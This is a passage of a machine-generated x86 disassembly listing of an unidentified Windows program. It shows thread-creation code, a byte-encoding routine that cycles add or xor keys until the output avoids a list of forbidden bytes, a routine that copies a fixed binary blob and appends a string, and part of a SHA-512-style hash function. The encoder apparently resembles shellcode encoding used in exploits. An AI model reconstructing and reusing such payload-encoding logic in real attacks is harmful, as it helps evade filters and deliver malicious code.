jmp short loc_414066
; ---------------------------------------------------------------------------
loc_414098: ; CODE XREF: sub_414042+49�j
call sub_40164F
mov ebx, [eax]
call sub_413F8F
loc_4140A4: ; CODE XREF: sub_414042+3C�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_414042 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4140AB proc near ; CODE XREF: sub_40177B+246�p
; sub_4019F3+1F8�p ...
var_50 = dword ptr -50h
var_4C = byte ptr -4Ch
Dest = byte ptr -4Bh
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 54h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push esi
push 0
push ecx
push eax
push 0
push 0
call ds:dword_41D110 ; CreateThread
test eax, eax
mov [esi+4], eax
jz short loc_414104
push edi ; Format
lea eax, [ebp+Dest]
push 38h ; Count
push eax ; Dest
call __snprintf
mov eax, [esi]
add esp, 0Ch
mov [ebp+var_10], eax
mov eax, dword_433C4C
push eax
mov ecx, offset dword_433C48
push ecx
lea eax, [ebp+var_50]
push eax
mov [ebp+var_4C], 0
mov [ebp+var_50], esi
call sub_4016BA
loc_414104: ; CODE XREF: sub_4140AB+27�j
push 1
push dword ptr [esi+4]
call ds:dword_41D07C ; WaitForSingleObject
mov ecx, [ebp+var_4]
xor ecx, ebp
mov eax, esi
call sub_402710
leave
retn 4
sub_4140AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41411F proc near ; CODE XREF: sub_41A5C1+1C7�p
; sub_41A5C1+1E1�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_0], 1
push esi
push edi
mov [ebp+var_2], 1
mov [ebp+var_1], 0
jnz loc_414239
mov eax, [ebp+arg_8]
lea esi, [eax+18h]
and eax, 80000001h
mov [ebp+var_8], esi
jns short loc_41414E
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_41414E: ; CODE XREF: sub_41411F+28�j
jz short loc_414154
mov [ebp+var_1], 1
loc_414154: ; CODE XREF: sub_41411F:loc_41414E�j
mov eax, 172h
cmp esi, eax
jle short loc_414167
cmp [ebp+var_1], 1
jnz loc_414324
loc_414167: ; CODE XREF: sub_41411F+3C�j
lea ecx, [esi+1]
cmp ecx, eax
mov [ebp+var_C], ecx
jle short loc_414181
cmp [ebp+var_1], 1
jnz short loc_414181
jmp loc_414324
; ---------------------------------------------------------------------------
loc_41417C: ; CODE XREF: sub_41411F+ED�j
mov eax, 172h
loc_414181: ; CODE XREF: sub_41411F+50�j
; sub_41411F+56�j
inc [ebp+var_2]
and [ebp+arg_0], 0
push eax ; size_t
push 0 ; int
push ebx ; void *
call _memset
add esp, 0Ch
push 6
pop ecx
mov esi, offset dword_424894
mov edi, ebx
rep movsd
mov cl, [ebp+var_2]
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebx+0Eh], cl
mov [ebx+12h], cl
jle short loc_4141C8
loc_4141B0: ; CODE XREF: sub_41411F+A7�j
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
mov al, [esi+eax]
add al, cl
mov [ebx+esi+18h], al
inc esi
cmp esi, [ebp+arg_8]
mov [ebp+arg_0], esi
jl short loc_4141B0
loc_4141C8: ; CODE XREF: sub_41411F+8F�j
cmp [ebp+var_1], 1
jnz short loc_4141D5
mov eax, [ebp+arg_0]
mov [eax+ebx+18h], cl
loc_4141D5: ; CODE XREF: sub_41411F+AD�j
cmp [ebp+var_8], edi
mov byte ptr [ebp+arg_0+3], 1
jle short loc_414217
loc_4141DE: ; CODE XREF: sub_41411F+E2�j
mov dl, [edi+ebx]
xor esi, esi
loc_4141E3: ; CODE XREF: sub_41411F+D0�j
mov eax, [ebp+arg_C]
cmp dl, [esi+eax]
jz short loc_4141F3
inc esi
cmp esi, 8
jl short loc_4141E3
jmp short loc_4141F7
; ---------------------------------------------------------------------------
loc_4141F3: ; CODE XREF: sub_41411F+CA�j
mov byte ptr [ebp+arg_0+3], 0
loc_4141F7: ; CODE XREF: sub_41411F+D2�j
cmp byte ptr [ebp+arg_0+3], 0
jz short loc_414203
inc edi
cmp edi, [ebp+var_8]
jl short loc_4141DE
loc_414203: ; CODE XREF: sub_41411F+DC�j
cmp byte ptr [ebp+arg_0+3], 1
jz short loc_414217
cmp cl, 0FFh
jb loc_41417C
jmp loc_414324
; ---------------------------------------------------------------------------
loc_414217: ; CODE XREF: sub_41411F+BD�j
; sub_41411F+E8�j ...
cmp [ebp+var_1], 1
jnz short loc_414226
mov eax, [ebp+var_C]
inc [ebp+arg_8]
mov [ebp+var_8], eax
loc_414226: ; CODE XREF: sub_41411F+FC�j
mov eax, [ebp+arg_8]
cdq
sub eax, edx
sar eax, 1
mov [ebx+3], al
mov eax, [ebp+var_8]
jmp loc_414326
; ---------------------------------------------------------------------------
loc_414239: ; CODE XREF: sub_41411F+14�j
cmp [ebp+arg_0], 2
jnz loc_414324
mov eax, [ebp+arg_8]
lea esi, [eax+18h]
and eax, 80000001h
mov [ebp+var_8], esi
jns short loc_414258
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_414258: ; CODE XREF: sub_41411F+132�j
jz short loc_41425E
mov [ebp+var_1], 1
loc_41425E: ; CODE XREF: sub_41411F:loc_414258�j
mov eax, 172h
cmp esi, eax
jle short loc_414271
cmp [ebp+var_1], 1
jnz loc_414324
loc_414271: ; CODE XREF: sub_41411F+146�j
lea ecx, [esi+1]
cmp ecx, eax
mov [ebp+var_C], ecx
jle short loc_41428B
cmp [ebp+var_1], 1
jnz short loc_41428B
jmp loc_414324
; ---------------------------------------------------------------------------
loc_414286: ; CODE XREF: sub_41411F+1FF�j
mov eax, 172h
loc_41428B: ; CODE XREF: sub_41411F+15A�j
; sub_41411F+160�j
inc [ebp+var_2]
and [ebp+arg_0], 0
push eax ; size_t
push 0 ; int
push ebx ; void *
call _memset
add esp, 0Ch
push 6
pop ecx
mov esi, offset dword_4248B0
mov edi, ebx
rep movsd
mov cl, [ebp+var_2]
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebx+0Eh], cl
mov [ebx+12h], cl
jle short loc_4142D2
loc_4142BA: ; CODE XREF: sub_41411F+1B1�j
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
mov al, [esi+eax]
xor al, cl
mov [ebx+esi+18h], al
inc esi
cmp esi, [ebp+arg_8]
mov [ebp+arg_0], esi
jl short loc_4142BA
loc_4142D2: ; CODE XREF: sub_41411F+199�j
cmp [ebp+var_1], 1
jnz short loc_4142DF
mov eax, [ebp+arg_0]
mov [eax+ebx+18h], cl
loc_4142DF: ; CODE XREF: sub_41411F+1B7�j
cmp [ebp+var_8], edi
mov byte ptr [ebp+arg_0+3], 1
jle loc_414217
loc_4142EC: ; CODE XREF: sub_41411F+1F0�j
mov dl, [edi+ebx]
xor esi, esi
loc_4142F1: ; CODE XREF: sub_41411F+1DE�j
mov eax, [ebp+arg_C]
cmp dl, [esi+eax]
jz short loc_414301
inc esi
cmp esi, 8
jl short loc_4142F1
jmp short loc_414305
; ---------------------------------------------------------------------------
loc_414301: ; CODE XREF: sub_41411F+1D8�j
mov byte ptr [ebp+arg_0+3], 0
loc_414305: ; CODE XREF: sub_41411F+1E0�j
cmp byte ptr [ebp+arg_0+3], 0
jz short loc_414311
inc edi
cmp edi, [ebp+var_8]
jl short loc_4142EC
loc_414311: ; CODE XREF: sub_41411F+1EA�j
cmp byte ptr [ebp+arg_0+3], 1
jz loc_414217
cmp cl, 0FFh
jb loc_414286
loc_414324: ; CODE XREF: sub_41411F+42�j
; sub_41411F+58�j ...
xor eax, eax
loc_414326: ; CODE XREF: sub_41411F+115�j
pop edi
pop esi
leave
retn
sub_41411F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41432A(void *,int)
sub_41432A proc near ; CODE XREF: sub_41A5C1+19F�p
; sub_41A9DE+490�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
lea edx, [eax+1]
loc_414333: ; CODE XREF: sub_41432A+E�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_414333
sub eax, edx
push ebx
lea ebx, [eax+0CCh]
cmp ebx, 172h
jg short loc_414393
push esi
push edi
mov edi, [ebp+arg_0]
push ebx ; size_t
push 0 ; int
push edi ; void *
call _memset
mov eax, [ebp+arg_4]
add esp, 0Ch
push 32h
pop ecx
mov esi, offset dword_4248D0
rep movsd
movsw
movsb
lea esi, [eax+1]
loc_41436F: ; CODE XREF: sub_41432A+4A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41436F
sub eax, esi
push eax
mov eax, [ebp+arg_0]
push [ebp+arg_4]
add eax, 0CAh
push eax
call unknown_libname_61 ; Microsoft VisualC 2-8/net runtime
add esp, 0Ch
pop edi
mov eax, ebx
pop esi
jmp short loc_414395
; ---------------------------------------------------------------------------
loc_414393: ; CODE XREF: sub_41432A+1F�j
xor eax, eax
loc_414395: ; CODE XREF: sub_41432A+67�j
pop ebx
pop ebp
retn
sub_41432A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4143A0 proc near ; CODE XREF: sub_41B7F9+64�p
xor ecx, ecx
push esi
push edi
mov [eax+8], ecx
mov [eax+0Ch], ecx
mov [eax], ecx
mov [eax+4], ecx
lea edi, [eax+10h]
mov ecx, 10h
mov esi, offset dword_41FE50
rep movsd
pop edi
pop esi
retn
sub_4143A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4143D0 proc near ; CODE XREF: sub_416AE0+BE�p
; sub_416AE0+13B�p ...
var_160 = dword ptr -160h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
var_F8 = dword ptr -0F8h
var_F4 = dword ptr -0F4h
var_F0 = dword ptr -0F0h
var_EC = dword ptr -0ECh
var_E8 = dword ptr -0E8h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 160h
mov eax, [esp+160h+arg_0]
mov edx, [eax+54h]
push ebx
mov [esp+164h+var_FC], edx
mov edx, [eax+5Ch]
push ebp
push esi
mov [esp+16Ch+var_10C], edx
mov edx, [eax+64h]
push edi
lea esi, [eax+10h]
mov [esp+170h+var_4], esi
mov ecx, 10h
lea edi, [esp+170h+var_158]
rep movsd
mov ecx, [eax+50h]
mov [esp+170h+var_100], ecx
mov ecx, [eax+58h]
mov [esp+170h+var_110], ecx
mov ecx, [eax+60h]
mov [esp+170h+var_108], ecx
mov ecx, [eax+68h]
mov [esp+170h+var_104], edx
mov edx, [eax+6Ch]
mov [esp+170h+var_B8], ecx
mov ecx, [eax+70h]
mov [esp+170h+var_B4], edx
mov edx, [eax+74h]
mov [esp+170h+var_A8], ecx
mov ecx, [eax+78h]
mov [esp+170h+var_A4], edx
mov edx, [eax+7Ch]
mov [esp+170h+var_D0], ecx
mov ecx, [eax+80h]
mov [esp+170h+var_CC], edx
mov edx, [eax+84h]
mov esi, [eax+0C4h]
mov [esp+170h+var_D8], ecx
mov ecx, [eax+88h]
mov [esp+170h+var_D4], edx
mov edx, [eax+8Ch]
mov [esp+170h+var_118], ecx
mov ecx, [eax+90h]
mov [esp+170h+var_114], edx
mov edx, [eax+94h]
mov [esp+170h+var_C8], ecx
mov ecx, [eax+98h]
mov [esp+170h+var_C4], edx
mov edx, [eax+9Ch]
mov [esp+170h+var_F0], ecx
mov ecx, [eax+0A0h]
mov [esp+170h+var_EC], edx
mov edx, [eax+0A4h]
mov [esp+170h+var_E8], ecx
mov ecx, [eax+0A8h]
mov [esp+170h+var_E4], edx
mov edx, [eax+0ACh]
mov [esp+170h+var_F8], ecx
mov ecx, [eax+0B0h]
mov [esp+170h+var_F4], edx
mov edx, [eax+0B4h]
mov [esp+170h+var_B0], ecx
mov ecx, [eax+0B8h]
mov [esp+170h+var_AC], edx
mov edx, [eax+0BCh]
mov [esp+170h+var_C0], ecx
mov ecx, [eax+0C0h]
mov [esp+170h+var_BC], edx
mov edx, [eax+0C8h]
mov eax, [eax+0CCh]
xor edi, edi
mov [esp+170h+var_15C], edi
mov [esp+170h+var_A0], ecx
mov [esp+170h+var_9C], esi
mov [esp+170h+var_E0], edx
mov [esp+170h+var_DC], eax
jmp short loc_41456E
; ---------------------------------------------------------------------------
align 10h
loc_414560: ; CODE XREF: sub_4143D0+2680�j
mov ecx, [esp+170h+var_A0]
mov esi, [esp+170h+var_9C]
loc_41456E: ; CODE XREF: sub_4143D0+18A�j
test edi, edi
mov eax, [esp+170h+var_138]
mov edx, [esp+170h+var_134]
jz loc_414658
mov edi, ecx
xor eax, eax
mov ebx, esi
shrd edi, ebx, 13h
or eax, edi
mov ebp, ecx
mov edx, ecx
mov edi, esi
shld esi, ebp, 3
shr ebx, 13h
shl edx, 0Dh
or edx, ebx
add ebp, ebp
xor ebx, ebx
or ebx, esi
mov esi, [esp+170h+var_9C]
shrd ecx, esi, 6
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor eax, edi
xor eax, ecx
mov ecx, [esp+170h+var_10C]
xor edx, ebx
mov [esp+170h+var_160], eax
mov eax, [esp+170h+var_110]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
shr esi, 6
xor edx, esi
xor edi, edi
or edi, ebx
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_10C]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_110]
shrd ecx, eax, 7
shr eax, 7
xor edi, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+arg_0]
xor edi, ecx
mov ecx, [esp+170h+var_160]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_100]
adc edx, [esp+170h+var_FC]
add ecx, [esp+170h+var_F0]
adc edx, [esp+170h+var_EC]
mov [eax+50h], ecx
mov [eax+54h], edx
mov eax, edx
mov edx, [esp+170h+var_134]
mov [esp+170h+var_FC], eax
mov [esp+170h+var_54], eax
mov eax, [esp+170h+var_138]
mov [esp+170h+var_100], ecx
mov [esp+170h+var_58], ecx
jmp short loc_41466E
; ---------------------------------------------------------------------------
loc_414658: ; CODE XREF: sub_4143D0+1A8�j
mov ecx, [esp+170h+var_100]
mov [esp+170h+var_58], ecx
mov ecx, [esp+170h+var_FC]
mov [esp+170h+var_54], ecx
loc_41466E: ; CODE XREF: sub_4143D0+286�j
mov ebx, edx
mov esi, edx
xor edi, edi
mov ecx, eax
shld ebx, ecx, 17h
or edi, ebx
shl ecx, 17h
xor ebx, ebx
shr esi, 9
or esi, ecx
mov ebp, eax
shrd ebp, edx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_134]
xor esi, ebx
shr edx, 12h
mov ecx, eax
shl ecx, 0Eh
or ecx, edx
xor edi, ecx
xor ecx, ecx
mov ebx, eax
shrd ebx, ebp, 0Eh
or ecx, ebx
xor esi, ecx
mov ecx, [esp+170h+var_134]
shr ebp, 0Eh
mov edx, eax
shl edx, 12h
or edx, ebp
mov ebp, [esp+170h+var_130]
xor edi, edx
and ebp, eax
mov edx, eax
mov eax, [esp+170h+var_12C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_11C]
not edx
and edx, [esp+170h+var_128]
not ebx
and ebx, [esp+170h+var_124]
xor edx, ebp
xor ebx, eax
mov eax, [esp+170h+var_15C]
add esi, edx
adc edi, ebx
add esi, ds:dword_41F950[eax*8]
adc edi, ds:dword_41F954[eax*8]
add esi, [esp+170h+var_58]
mov eax, [esp+170h+var_120]
adc edi, [esp+170h+var_54]
add eax, esi
adc ecx, edi
add [esp+170h+var_140], eax
mov [esp+170h+var_11C], ecx
mov [esp+170h+var_120], eax
adc [esp+170h+var_13C], ecx
mov eax, [esp+170h+var_154]
mov ecx, [esp+170h+var_158]
mov edx, ecx
mov esi, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
mov ecx, eax
xor edi, edx
xor esi, ebx
shr ecx, 7
mov ebx, [esp+170h+var_158]
mov ebp, eax
shld ebp, ebx, 19h
shl ebx, 19h
or ecx, ebx
xor edx, edx
or edx, ebp
mov ebp, [esp+170h+var_14C]
xor edi, ecx
mov ecx, [esp+170h+var_150]
xor esi, edx
mov edx, [esp+170h+var_158]
mov ebx, ecx
xor ebx, edx
and ebx, [esp+170h+var_148]
and ecx, edx
mov edx, [esp+170h+var_14C]
xor ebp, eax
and ebp, [esp+170h+var_144]
and edx, eax
xor ebx, ecx
xor ebp, edx
add edi, ebx
adc esi, ebp
add [esp+170h+var_120], edi
adc [esp+170h+var_11C], esi
cmp [esp+170h+var_15C], 0
jz loc_414884
mov eax, [esp+170h+var_E0]
mov ecx, [esp+170h+var_DC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_DC]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_108]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_104]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_108]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_104]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_E8]
adc edx, [esp+170h+var_E4]
add ecx, [esp+170h+var_110]
adc edx, [esp+170h+var_10C]
mov [eax+58h], ecx
mov [eax+5Ch], edx
mov eax, edx
mov [esp+170h+var_110], ecx
mov [esp+170h+var_10C], eax
mov [esp+170h+var_28], ecx
jmp short loc_414893
; ---------------------------------------------------------------------------
loc_414884: ; CODE XREF: sub_4143D0+3D5�j
mov edx, [esp+170h+var_110]
mov eax, [esp+170h+var_10C]
mov [esp+170h+var_28], edx
loc_414893: ; CODE XREF: sub_4143D0+4B2�j
mov ecx, [esp+170h+var_13C]
mov ebx, ecx
mov [esp+170h+var_24], eax
mov eax, [esp+170h+var_140]
mov edx, ecx
xor esi, esi
shr edx, 9
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
or edx, edi
xor ebx, ebx
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_13C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
xor edi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
xor esi, ecx
mov ecx, [esp+170h+var_13C]
mov ebx, ecx
and ecx, [esp+170h+var_134]
mov edi, eax
and eax, [esp+170h+var_138]
not ebx
and ebx, [esp+170h+var_12C]
not edi
and edi, [esp+170h+var_130]
xor ebx, ecx
mov ecx, [esp+170h+var_124]
xor edi, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F958[eax*8]
adc esi, ds:dword_41F95C[eax*8]
add edx, [esp+170h+var_28]
mov eax, [esp+170h+var_128]
adc esi, [esp+170h+var_24]
add eax, edx
adc ecx, esi
add [esp+170h+var_148], eax
mov [esp+170h+var_124], ecx
mov [esp+170h+var_128], eax
adc [esp+170h+var_144], ecx
mov eax, [esp+170h+var_11C]
mov ecx, [esp+170h+var_120]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_120]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_154]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_158]
xor edi, ecx
mov ecx, [esp+170h+var_120]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_150]
and edx, ecx
mov ecx, [esp+170h+var_154]
xor ebp, eax
and ebp, [esp+170h+var_14C]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_128], edi
adc [esp+170h+var_124], esi
cmp [esp+170h+var_15C], 0
jz loc_414AAE
mov eax, [esp+170h+var_B8]
mov ecx, [esp+170h+var_B4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_B4]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_100]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_FC]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_100]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_FC]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_F8]
adc edx, [esp+170h+var_F4]
add ecx, [esp+170h+var_108]
adc edx, [esp+170h+var_104]
mov [eax+60h], ecx
mov [eax+64h], edx
mov eax, edx
mov [esp+170h+var_108], ecx
mov [esp+170h+var_104], eax
mov [esp+170h+var_70], ecx
jmp short loc_414ABD
; ---------------------------------------------------------------------------
loc_414AAE: ; CODE XREF: sub_4143D0+605�j
mov edx, [esp+170h+var_108]
mov eax, [esp+170h+var_104]
mov [esp+170h+var_70], edx
loc_414ABD: ; CODE XREF: sub_4143D0+6DC�j
mov ecx, [esp+170h+var_144]
mov ebx, ecx
mov [esp+170h+var_6C], eax
mov eax, [esp+170h+var_148]
mov edx, ecx
xor esi, esi
shr edx, 9
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
or edx, edi
xor ebx, ebx
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_144]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
xor edi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
xor esi, ecx
mov ecx, [esp+170h+var_144]
mov ebx, ecx
and ecx, [esp+170h+var_13C]
mov edi, eax
and eax, [esp+170h+var_140]
not ebx
and ebx, [esp+170h+var_134]
not edi
and edi, [esp+170h+var_138]
xor ebx, ecx
mov ecx, [esp+170h+var_12C]
xor edi, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F960[eax*8]
adc esi, ds:dword_41F964[eax*8]
add edx, [esp+170h+var_70]
mov eax, [esp+170h+var_130]
adc esi, [esp+170h+var_6C]
add eax, edx
adc ecx, esi
add [esp+170h+var_150], eax
mov [esp+170h+var_12C], ecx
mov [esp+170h+var_130], eax
adc [esp+170h+var_14C], ecx
mov eax, [esp+170h+var_124]
mov ecx, [esp+170h+var_128]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_128]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_11C]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_120]
xor edi, ecx
mov ecx, [esp+170h+var_128]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_158]
and edx, ecx
mov ecx, [esp+170h+var_11C]
xor ebp, eax
and ebp, [esp+170h+var_154]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_130], edi
adc [esp+170h+var_12C], esi
cmp [esp+170h+var_15C], 0
jz loc_414CEA
mov eax, [esp+170h+var_A8]
mov ecx, [esp+170h+var_A4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_A4]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_110]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_10C]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_110]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_10C]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_B0]
adc edx, [esp+170h+var_AC]
